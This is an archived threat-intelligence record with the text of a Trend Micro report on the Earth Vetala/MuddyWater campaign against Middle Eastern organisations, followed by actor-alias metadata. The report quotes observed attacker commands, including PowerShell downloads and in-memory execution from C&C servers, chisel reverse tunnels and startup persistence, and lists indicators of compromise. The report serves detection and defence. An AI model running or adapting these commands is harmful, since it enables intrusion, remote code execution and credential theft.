{ "id": "b38469ef-a6f5-40bc-995b-fb0642bad99e", "created_at": "2026-04-06T00:11:25.177071Z", "updated_at": "2026-04-10T03:36:48.055511Z", "deleted_at": null, "sha1_hash": "3fb6629ff0e1e8632833f77c9f2078e121e1fff8", "title": "Earth Vetala MuddyWater Continues to Target Organizations in the Middle East", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 903861, "plain_text": "Earth Vetala MuddyWater Continues to Target Organizations in the\r\nMiddle East\r\nBy By: Adi Peretz, Erick Thek Mar 05, 2021 Read time: 7 min (1860 words)\r\nPublished: 2021-03-05 · Archived: 2026-04-02 12:35:20 UTC\r\nTrend Micro researchers recently detected activity targeting various organizations in the Middle East and neighboring\r\nregions. We were tipped off to this activity in part by research from Anomali, which also identified a campaign targeting\r\nsimilar victims. We believe (with moderate confidence) that this newly identified activity is connected to MuddyWater (also\r\nknown as TEMP.Zagros, Static Kitten, Seedworm).\r\nAdditionally, we were able to link the Anomali-identified activity to an ongoing campaign in 2021. This campaign uses the\r\nfollowing legitimate remote admin tools such as:\r\nScreenConnectopen on a new tab\r\nRemoteUtilities\r\nWe have named this intrusion set Earth Vetala. Earth Vetala used spearphishing emails with embedded links to a legitimate\r\nfile-sharing service to distribute their malicious package. The links were embedded within lure documents as well as emails.\r\nOnce a victim was accessed, attackers would determine if the user account was an administrator or normal user. They would\r\nthen download post-exploitation tools that included password/process-dumping utilities, reverse-tunneling tools, and custom\r\nbackdoors. The threat actors would then initiate communications with additional command-and-control (C\u0026C) infrastructure\r\nto execute obfuscated PowerShell scripts.\r\nOverview\r\nAnalysis indicates the Earth Vetala campaign is ongoing and that this threat actor has interests which appear to align with\r\nIran.\r\nEarth Vetala historically targets countries in the Middle East. In this campaign, Earth Vetala threat actors used spearphishing\r\nemails and lure documents against organizations within the United Arab Emirates, Saudi Arabia, Israel, and Azerbaijan. The\r\nphishing emails and lure documents contain embedded URLs linking to a legitimate file-sharing service to distribute\r\narchives containing the ScreenConnect remote administrator tool. ScreenConnect is a legitimate application that allows\r\nsystems administrators to manage their enterprise systems remotely.\r\nOur research found threat indicators that were connected to the same campaign identified by Anomali. Analysis indicates\r\nthat Earth Vetala is still ongoing as of the publishing of this post. During this campaign, threat actors used post-exploitation\r\ntools to dump passwords, tunnel their C\u0026C communication using open-source tools, and use additional C\u0026C infrastructure\r\nto establish a persistent presence within targeted hosts and environments.\r\nTechnical Analysis\r\nDuring our research, we observed a spearphishing email allegedly from a government agency.\r\nFigure 1. Phishing Email with the embedded URL\r\nThe email attempts to convince recipients to click the URL and download a malicious file. We have seen that one of two\r\nfiles may be downloaded, one being a .PDF file and the other an .RTF file.\r\nhttps://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html\r\nPage 1 of 8\n\nAs with the spearphishing email, the lure documents' content attempts to convince the victim to click on another malicious\r\nURL and download a .ZIP file.\r\nThe .ZIP file contains a copy of a legitimate remote administration software developed by RemoteUtilities and provides\r\nremote administration capabilities, including:\r\nDownloading and uploading files\r\nGrabbing screenshots\r\nBrowsing files and directories\r\nExecuting and terminating processes\r\nDuring our research, we were able to discover multiple .ZIP files used to distribute the RemoteUtilities remote\r\nadministration software in the manner above, with all of these distributing the same RemoteUtilities sample. The use of this\r\ntool differentiates this particular campaign from earlier research, as in previous attacks ScreenConnect was used. Otherwise,\r\nthe TTPs in use remain broadly similar.\r\nRemoteUtilities Analysis\r\nWhen the RemoteUtilities software is executed, its process launches msiexec.exe with the following command:\r\nFigure 2. RemoteUtilities Installation\r\nThe MSI installer installs a service on the victim machine called Remote Utilities – Host:\r\nFigure 3. Remote Utilities Service\r\nThe service then communicates with the domain id.remoteutilities.com, which belongs to RemoteUtilities. This connection\r\nis related to one of its features called Internet-ID Connection. This feature allows an intermediary Internet server to broker\r\nthe connection, similar to a proxy server. This allows the threat actor to connect to the Internet-ID server, which then\r\nconnects to the actual RemoteUtilities host.\r\nhttps://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html\r\nPage 2 of 8\n\nFigure 4. id-server connection\r\nPost-Exploitation Analysis\r\nDuring our research, we discovered a compromised host in Saudi Arabia that used ScreenConnect remote administration\r\nsoftware. They were targeted via a malicious .ZIP file (SHA256 hash:\r\nb2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf) that contained a ScreenConnect executable\r\n(SHA256 hash: 2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf)\r\nAs noted above, the ScreenConnect executable connects to the Internet-ID server, which is located at instance-sy9at2-\r\nrelay.screenconnect.com and resolves to 51.68.244.39.\r\nThe same domain was mentioned in the previous research. We then observed the threat actors interact with the compromised\r\nhost using the ScreenConnect software, executing the following commands.\r\ncmd.exe net user /domain\r\nThe command above allows the attacker to get all the users from the domain controller.\r\nThe next command executed is the following:\r\npowershell.exe -exec bypass -w 1 -file a.ps1\r\nThis is a command to execute a PowerShell script of some kind. However, we did not have access to the a.ps1 file. We are\r\nnot sure what functionality is provided here.\r\nThe next command issued is the following:\r\npowershell.exe iwr -uri http://87.236.212[.]184/SharpChisel.exe -outfile c:\\programdata\\SharpChisel.exe -usebasicparsing\r\nThe command is connected to 187.236.212[.]184 and downloads a file called SharpChisel.exe (SHA256:\r\n61f83466b512eb12fc82441259a5205f076254546a7726a2e3e983011898e4e2) and saves the file to the C:\\programdata\r\ndirectory. The name SharpChisel may be related to the purpose of this file, which is a C# wrapper for a tunneling tool called\r\nchisel. The above IP address is geolocated to a server in Iran.\r\nThe following command then configures SharpChisel:\r\nC:\\programdata\\SharpChisel.exe client 87.236.212[.]184:8080 r:8888:127.0.0.1:9999\r\nThis directs all traffic to the localhost at port 9999 to the same remote server.\r\nAnother instance of SharpChisel with different settings is executed, this time using PowerShell using the following\r\ncommand line:\r\npowershell.exe C:\\programdata\\SharpChisel.exe client 87.236.212[.]184:443 R:8888:127.0.0.1:9999\r\nThis time, traffic will be forwarded to the server over port 443.\r\nA third SharpChisel instance that connects to a different C\u0026C server at 23.95.215.100:8080 is started via the following\r\ncommand:\r\nC:\\programdata\\SharpChisel.exe client 23.95.215[.]100:8080 r:8888:127.0.0.1:9999\r\nIt is then configured with the following command line PowerShell command:\r\nhttps://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html\r\nPage 3 of 8\n\npowershell.exe C:\\programdata\\SharpChisel.exe client 23.95.215[.]100:8080 R:8888:127.0.0.1:9999\r\nWe believe that the threat actor was unable to configure SharpChisel to work correctly. The use of the following command\r\nprovides additional evidence to support our assumption:\r\npowershell.exe iwr -uri hxxp://87.236.212[.]184/procdump64.exe -outfile c:\\programdata\\procdump64.exe -usebasicparsing\r\nThe command connects to the C\u0026C server, downloads procdump64.exe, and saves the file in the C:\\programdata directory.\r\nThat supports our assumption that SharpChisel could not be configured correctly, and the attacker instead used PowerShell\r\nto download and run the legitimate procdump64.exe utility.\r\nFigure 5. LIGOLO execution example\r\nThis was done using two separate commands:\r\nC:\\programdate\\1.exe -relayserver 87.236.212[.]184:5555\r\nC:\\users\\public\\new.exe -relayserver 87.236.212[.]184:5555\r\nWe then see the threat actor again attempting to use SharpChisel several times using the following command:\r\nC:\\programdata\\SharpChisel.exe  client 87.236.212[.]184:8080 r:8888:127.0.0.1:9999\r\npowershell.exe C:\\programdata\\SharpChisel.exe client 87.236.212[.]184:8080 R:8888:127.0.0.1:9999\r\nWe conclude that a tunneling connection to the C\u0026C server could not be established, even after attempts to do so with two\r\ndifferent tools.\r\nFollowing the unsuccessful attempt to configure a tunnel connection to their C\u0026C server, the threat actors downloaded a\r\nremote access tool (RAT) and attempted to configure it. The following PowerShell command was used for this:\r\npowershell.exe iwr -uri hxxp://87.236.212[.]184/out1 -outfile c:\\users\\public\\out1.exe -usebasicparsing\r\nThe command downloads out1.exe and saves the file in the C:\\users\\public\\ directory. Using a UPX unpacker, we were able\r\nto extract the contents, which consists of a Python executable. We then decompiled the python executable using\r\npyinstxtractor.py to get all of the Python bytecode files. These are then decompiled to get the original python code using\r\neasypythondecompiler.\r\nThe out1.exe RAT has the following capabilities:\r\nData encoding\r\nEmail parsing\r\nFile and registry copy\r\nHTTP/S connection support\r\nNative command line\r\nProcess and file execution\r\nAfter this, the file C:\\users\\public\\Browser64.exe is run. Browser64 is a tool that extracts credentials from the following\r\napplications:\r\nChrome\r\nChromium\r\nFirefox\r\nOpera\r\nInternet Explorer\r\nOutlook\r\nhttps://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html\r\nPage 4 of 8\n\nFigure 6. Usage Example of Browser64.exe\r\nFollowing the use of browser64.exe, we observed the following command being executed:\r\npowershell.exe iex(new-object\r\nSystem.Net.WebClient).DownloadString('hxxp://23.94.50[.]197:444/index.jsp/deb2b1a127c472229babbb8dc2dca1c2/QPKb49mivezAdai1')\r\nThey again attempted to use SharpChisel with no success:\r\npowershell.exe C:\\programdata\\SharpChisel.exe client 23.95.215[.]100:443 R:8888:127.0.0.1:9999\r\nC:\\programdata\\SharpChisel.exe client 23.95.215[.]100:443 R:8888:127.0.0.1:9999\r\nC:\\programdata\\SharpChisel.exe server -p 9999 --socks5\r\nFinally, we observed a persistence mechanism being set using the following commands:\r\ncmd.exe /c Wscript.exe \"C:\\Users\\[REDACTED]\\AppData\\Roaming\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\news.js\"\r\ncmd.exe /c \"C:\\Users\\[REDACTED]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\newsblog.js\"We\r\nwere able to get a copy of newsblog.js, which is a simple VBS downloader that communicates with the following URL:\r\nhxxp://23[.]95[.]215[.]100:8008/index.jsp/7e95a3d753cc4a17793ef9513e030b49/4t2Fg7k6wWRnKgd9\r\nFigure 7. newsblog.js\r\nThe script sets up a new HTTP object and then tries to disable the system's local proxy settings. The script then executes an\r\nHTTP GET request to the C\u0026C URL, grabs the server's response, and sleeps for 10 seconds.\r\nAt the time of our analysis, this server was still available. The response from the server contains an encoded PowerShell\r\nscript, which is executed in memory. Decoding this script reveals that it contains a backdoor:\r\nhttps://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html\r\nPage 5 of 8\n\nFigure 8. deobfuscated PowerShell backdoor\r\nThe screenshot above shows an abbreviated view of the in-memory PowerShell backdoor. The PowerShell backdoor has the\r\nfollowing capabilities.\r\nCheck for Skype connectivity\r\nDownload and install Skype\r\nEncoded communication with its C2\r\nExecute commands sent from the C2 server\r\nGet multifactor authentication settings\r\nGet the currently logged on user and OS version\r\nEarth Vetala Footprint\r\nEarth Vetala conducted an extensive offensive campaign targeting multiple countries. We observed it operating in the\r\nfollowing countries:\r\nAzerbaijan\r\nBahrain\r\nIsrael\r\nSaudi Arabia\r\nUnited Arab Emirates\r\nhttps://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html\r\nPage 6 of 8\n\nFigure 9. Affected countries\r\nWe observed Earth Vetala target the following sectors:\r\nGovernment Agencies\r\nAcademia\r\nTourism\r\nTrend Micro Solutions\r\nEarth Vetala represents an interesting threat. While it possesses remote access capabilities, the attackers seem to lack the\r\nexpertise to use all of these tools correctly. This is unexpected since we believe this attack is connected to the MuddyWater\r\nthreat actors — and in other connected campaigns, the attackers have shown higher levels of technical skill.\r\nOur findings in this area were made possible by our Dedicated Intelligence Research (DIR) analysts. They are on-hand to\r\nhelp organizations reach important decisions and understand the nature of the security challenges they face. For more\r\ninformation on the Dedicated Intelligence Research service, please contact your regional Sales team to learn more.\r\nMITRE ATT\u0026CK Techniques Mapping\r\nTactic Technique\r\nResource Development Acquire Infrastructure: Web Services – T1583.006\r\nInitial Access\r\nPhishing: Spearphishing Attachment – T1566.001\r\nPhishing: Spearphishing Link – T1566.002\r\nExecution\r\nCommand and Scripting Interpreter: PowerShell – T1059.001\r\nCommand and Scripting Interpreter: Windows Command Shell – T1059.003\r\nCommand and Scripting Interpreter: Visual Basic – T1059.005\r\nUser Execution: Malicious Link – T1204.001\r\nUser Execution: Malicious File – T1204.002\r\nPersistence, Privilege\r\nEscalation\r\nBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder -\r\nT1547.001\r\nhttps://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html\r\nPage 7 of 8\n\nDiscovery Account Discovery: Domain Account - T1087.002\r\nCredential Access Credentials from Password Stores: Credentials from Web Browsers – T1555.003\r\nCommand and Control Data Encoding: Standard Encoding – T1132.001\r\nDefense Evasion Deobfuscate/Decode Files or Information - T1140\r\nIndicators of Compromise\r\nFiles\r\nFile name SHA-256 Trend Micro Detection Name Desc\r\nSharpChisel.exe 61f83466b512eb12fc82441259a5205f076254546a7726a2e3e983011898e4e2 HackTool.MSIL.Chisel.A Shar\r\nPD64.dll ccdddd1ebf3c5de2e68b4dcb8fbc7d4ed32e8f39f6fdf71ac022a7b4d0aa4131 Trojan.Win64.PASSDUMP.A\r\nFile\r\nHac\r\nPasswordDumper.exe 0cd6f593cc58ba3ac40f9803d97a6162a308ec3caa53e1ea1ce7f977f2e667d3 HackTool.Win64.PassDump.AC Pass\r\nout1.exe 79fd822627b72bd2fbe9eae43cf98c99c2ecaa5649b7a3a4cfdc3ef8f977f2e6 HackTool.Win64.Lazagne.AG Pyin\r\nnewsblog.js 304ea86131c4d105d35ebbf2784d44ea24f0328fb483db29b7ad5ffe514454f8 Trojan.JS.DLOADR.AUSUOL VBS\r\nnew.exe fb414beebfb9ecbc6cb9b35c1d2adc48102529d358c7a8997e903923f7eda1a2 HackTool.Win64.LIGOLO.A LIG\r\nBrowser64.exe 3495b0a6508f1af0f95906efeba36148296dccd2ab8ffb4e569254b683584fea HackTool.Win64.BrowserDumper.A Tool\r\n1.exe 78b1ab1b8196dc236fa6ad4014dd6add142b3cab583e116da7e8886bc47a7347 HackTool.Win64.LIGOLO.A LIG\r\n إلکرتونیة مکتبة.pdf 70cab18770795ea23e15851fa49be03314dc081fc44cdf76e8f0c9b889515c1b Trojan.PDF.RemoteUtilities.A PDF\r\n  468e331fd3f9c41399e3e90f6fe033379ab69ced5e11b35665790d4a4b7cf254 Trojan.W97M.RemoteUtilities.A RTF\r\nإلکرتونیة مکتبة .zip f865531608a4150ea5d77ef3dd148209881fc8d831b2cfb8ca95ceb5868e1393 PUA.Win32.RemoteUtilities.A\r\nArch\r\nRem\r\nإلکرتونیة مکتبة.exe f664670044dbd967ff9a5d8d8f345be294053e0bae80886cc275f105d8e7a376 PUA.Win32.RemoteUtilities.A\r\nRem\r\nsoftw\r\nبرنامج.zip 8bee2012e1f79d882ae635a82b65f88eaf053498a6b268c594b0d7d601b1212f PUA.Win32.RemoteUtilities.A\r\nArch\r\nRem\r\nبرنامجدولیة.zip 9b345d2d9f52cda989a0780acadf45350b423957fb7b7668b9193afca3e0cd27 PUA.Win32.RemoteUtilities.A\r\nArch\r\nRem\r\nمجانية ورش.zip 5e2642f33115c3505bb1d83b137e7f2b18e141930975636e6230cdd4292990dd PUA.Win32.RemoteUtilities.A\r\nArch\r\nRem\r\nمکتالمنحالدراسیة.zip b2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf PUA.Win32.ScreenConnect.P\r\nArch\r\nScre\r\nالدرایةس المنح.exe 3e4e179a7a6718eedf36608bd7130b62a5a464ac301a211c3c8e37c7e4b0b32b PUA.Win32.ScreenConnect.P\r\nScre\r\nsoftw\r\nNetwork\r\n23.94.50.197:444\r\n23.95.215.100:443\r\n23.95.215.100:8080\r\n87.236.212.184:443\r\n87.236.212.184:8008\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html\r\nhttps://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MISPGALAXY", "Malpedia", "MITRE" ], "references": [ "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html" ], "report_names": [ "earth-vetala---muddywater-continues-to-target-organizations-in-t.html" ], "threat_actors": [ { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434285, "ts_updated_at": 1775792208, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3fb6629ff0e1e8632833f77c9f2078e121e1fff8.pdf", "text": "https://archive.orkl.eu/3fb6629ff0e1e8632833f77c9f2078e121e1fff8.txt", "img": "https://archive.orkl.eu/3fb6629ff0e1e8632833f77c9f2078e121e1fff8.jpg" } }